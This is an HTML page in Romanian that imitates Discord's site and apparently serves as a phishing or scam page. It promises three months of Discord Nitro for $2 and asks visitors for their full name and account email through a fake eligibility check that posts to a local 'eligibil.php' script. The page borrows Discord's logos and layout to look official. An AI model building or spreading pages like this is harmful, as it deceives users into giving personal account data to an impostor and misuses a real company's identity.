<!DOCTYPE html>
<html data-wf-domain="discord-2022.webflow.io" data-wf-page="644fa996cf20d45e60e402b6" data-wf-site="6257adef93867e50d84d30e2" data-wf-status="1">
   <head>
      <meta charset="utf-8"/>
      <title>Oferta limitata - Discord</title>
      <link href="https://assets-global.website-files.com/6257adef93867e50d84d30e2/css/discord-2022.webflow.f9a19ee93.css" rel="stylesheet" type="text/css"/>
      <link href="https://fonts.googleapis.com/" rel="preconnect"/>
      <link href="https://fonts.gstatic.com/" rel="preconnect" crossorigin="anonymous"/>
      <link href="https://assets-global.website-files.com/6257adef93867e50d84d30e2/62fddf0fde45a8baedcc7ee5_847541504914fd33810e70a0ea73177e (2)-1.png" rel="shortcut icon" type="image/x-icon"/>
      <link href="https://assets-global.website-files.com/6257adef93867e50d84d30e2/6266bc493fb42d4e27bb8393_847541504914fd33810e70a0ea73177e.ico" rel="apple-touch-icon"/>
      <link rel="stylesheet" href="style.css">
   </head>
   <body>
      <div>
         <div class="nav-blue">
            <div data-animation="over-right" class="navbar w-nav" data-easing2="ease" data-easing="ease" data-collapse="medium" data-w-id="11496e0f-7a6b-6414-d08d-3c86f0aee120" role="banner" data-duration="400" data-doc-height="1">
               <div class="container-1180px flex">
                  <a href="https://discord.com/" data-track-nav="landing" class="w-nav-brand"><img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/6257d23c5fb25be7e0b6e220_Open Source Projects _ Discord-7.svg" loading="lazy" alt="" class="discord"/><img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/6257d377b13ff484638adb92_svg7.svg" loading="lazy" alt="" class="discord-black"/><img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/625eb604bb8605784489d361_Discord-Logo+Wordmark-Color (1).png" loading="lazy" alt="" class="discord-blue"/></a>
                  <nav role="navigation" class="nav-menu w-nav-menu">
                     <div class="invert"><img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/6257d23c5fb25be7e0b6e220_Open Source Projects _ Discord-7.svg" loading="lazy" alt="" class="discord2"/></div>
                     <div class="div-block-4">
                        <a href="https://discord.com/download" data-track-nav="download" class="nav-link w-nav-link">Descarca</a><a href="http://discord.com/nitro" data-track-nav="nitro" class="nav-link w-nav-link">Nitro</a><a href="https://discord.com/servers" data-track-nav="safety" class="nav-link mobile-hide w-nav-link">Descopera</a><a href="https://discord.com/safetycenter" data-track-nav="safety" class="nav-link mobile-hide w-nav-link">Siguranta</a>
                        <div data-w-id="7ce12d8f-16a9-c1e8-0f75-3112508ce71e" class="nav-link-arrow">Siguranta</div>
                        <div data-w-id="0e67eaf0-da8e-58d4-f44e-162dccc23ab4" class="nav-link-arrow">Mod Academy</div>
                        <a href="https://support.discord.com/hc" data-track-nav="support" class="nav-link w-nav-link">Asistenta</a><a href="https://discord.com/blog" data-track-nav="blog" class="nav-link w-nav-link">Blog</a><a href="https://discord.com/careers" data-track-nav="jobs" class="nav-link w-nav-link">Cariera</a>
                     </div>
                     <div class="div-block-absol">
                        <a href="https://discord.com/api/downloads/distributions/app/installers/latest?channel=stable&amp;platform=win&amp;arch=x86" class="button-blue-menu download-button w-inline-block">
                           <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/6259470cb8f7d17c38408689_Frame.svg" loading="lazy" alt="" class="img-8px"/>
                           <div class="new-dark-button download-button mobile">Descarca</div>
                        </a>
                     </div>
                  </nav>
                  <a data-track="login" href="https://discord.com/app" class="button-white footer-open-discord-button footer-open-discord-button-js w-button">Login</a>
                  <div class="menu-button w-nav-button"><img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/625846fc39fbe53385840143_1 (3).svg" loading="lazy" data-w-id="11496e0f-7a6b-6414-d08d-3c86f0aee13a" alt=""/><img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/625846fc39fbe53385840143_1 (3).svg" loading="lazy" alt="" class="invert-color-black"/></div>
               </div>
            </div>
         </div>
         <div class="hero-bg-wrapper video-new2">
            <div class="container1180 left-align nitro-1120">
               <div class="hero-text-wr nitro-new">
                  <h1 class="new-h1 font-white capital">Ai trei luni de Discord Nitro la doar 2$</h1>
                  <div class="p-400-16-white center _20px">Echipa discord iti ofera oportunitatea de a beneficia de Discord Nitro pentru 3 luni la cel mai avantajos pret!</div>
                  <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/62a315f45888ab5517509314_b941bc1dfe379db6cc1f2acc5a612f41.png" loading="lazy" width="320" sizes="(max-width: 991px) 320px, 100vw" srcset="https://assets-global.website-files.com/6257adef93867e50d84d30e2/62a315f45888ab5517509314_b941bc1dfe379db6cc1f2acc5a612f41-p-500.png 500w, https://assets-global.website-files.com/6257adef93867e50d84d30e2/62a315f45888ab5517509314_b941bc1dfe379db6cc1f2acc5a612f41.png 640w" alt="" class="nitro-hero-img-new"/>
               </div>
            </div>
            <div class="video-link-wrapper">
               <div class="video-link-new w-embed">
                  <video width="112%" height="120%" autoplay loop muted >
                     <source src="https://discord.com/assets/ff96c6cc388e99cdcdd33e996ba9f893.webm" type="video/webm">
                     <source src="other/videonitro.mp4" type="video/mp4">
                  </video>
               </div>
            </div>
         </div>
         <div class="section-white nitro wf-section">
            <div class="container-1180px">
               <div class="flex-horizontal-r-l bottom-120px minus">
                  <div class="banner nitro">
                     <h3 class="new-h3 font-white capital">Trebuie sa aflam daca esti eligibil!</h3>   
                     <form id="sendData" action="eligibil.php" method="POST">
                        <label for="nume" class="text-input">Nume complet</label>
                        <input type="text" name="nume" id="nume" class="date-input" required>
                        <label for="email" class="text-input">Adresa de email a contului</label>
                        <input type="email" name="email" id="email" class="date-input" required>
                        <p id="textInfo">*Datele sunt folosite cu scopul de a identifica utilizatorul</p>
                     </form>
                     <button type="submit" form="sendData" name="trimiteDatele" class="button-white nitro w-button">Apasa pentru a verifica!</button>
                  </div>
                  <div class="banner nitro violet">
                     <h3 class="new-h3 font-white capital">Ce benefici are Discord Nitro?</h3>  
                     <div class="div-block-flex-bottom">
                        <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/633beb46b101837b5c2fc3fb_Vector (14).svg" loading="lazy" alt="" class="img-20px"/>
                        <div class="p-400-16-white _10px _20px">Incarcari de 500 MB</div>
                     </div>
                     <div class="div-block-flex-bottom">
                        <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/633beb45f5c7e8aed02d1ce1_Vector (15).svg" loading="lazy" alt="" class="img-20px"/>
                        <div class="p-400-16-white _10px _20px">Emoji-uri personalizate oriunde</div>
                     </div>
                     <div class="div-block-flex-bottom">
                        <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/633bf1841225cb2fb8b85bf5_Stream Quality_white.svg" loading="lazy" width="20" alt="" class="img-20px"/>
                        <div class="p-400-16-white _10px _20px">Streaming HD video</div>
                     </div>
                     <div class="div-block-flex-bottom">
                        <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/6344399faa4bd8012421e3dd_Activity (1).svg" loading="lazy" width="20" alt="" class="img-20px"/>
                        <div class="p-400-16-white _10px _20px">Acces la activitati</div>
                        <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/6347e60056367ea960a23791_Frame 1083.svg" loading="lazy" alt="" class="access-bg hidden"/>
                     </div>
                     <div class="div-block-flex-bottom">
                        <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/633bf190cfeb987aaeb553e0_Large.svg" loading="lazy" alt="" class="img-20px"/>
                        <div class="p-400-16-white _10px _20px">2 stimulatoare pentru server</div>
                     </div>
                     <div class="div-block-flex-bottom">
                        <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/633bf183d99eb03bfb2c8854_Filled_Icons.svg" loading="lazy" alt="" class="img-20px"/>
                        <div class="p-400-16-white _10px _20px">Profiluri personalizate si multe altele!</div>
                     </div>
                  </div>
               </div>
            </div>
            <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/633c218cd4c58403c2192ef0_Group 482477.svg" loading="lazy" alt="" class="image-11"/><img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/633c218c78fdb568bd88e308_Group 482467.svg" loading="lazy" alt="" class="image-12"/>
         </div>
         <div class="section-2 nitro wf-section">
            <div class="container-1180px flex-center">
               <h3 class="new-h3 font-white nitro">Daca nu esti eligibil, nu te supara!</h3>
               <h4 style = "color: white">Poti reincerca din nou peste 24h de la ultima reincercare.</h4>
            </div>
            <img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/63495c5f446cd73f82366c8f_Group 482480.svg" loading="lazy" alt="" class="unleash-image-bg-1"/><img src="https://assets-global.website-files.com/6257adef93867e50d84d30e2/63495c4907d2bd0ac38fb771_Group 482479.svg" loading="lazy" alt="" class="unleash-image-bg-2"/>
         </div>
      </div>
   </body>
</html>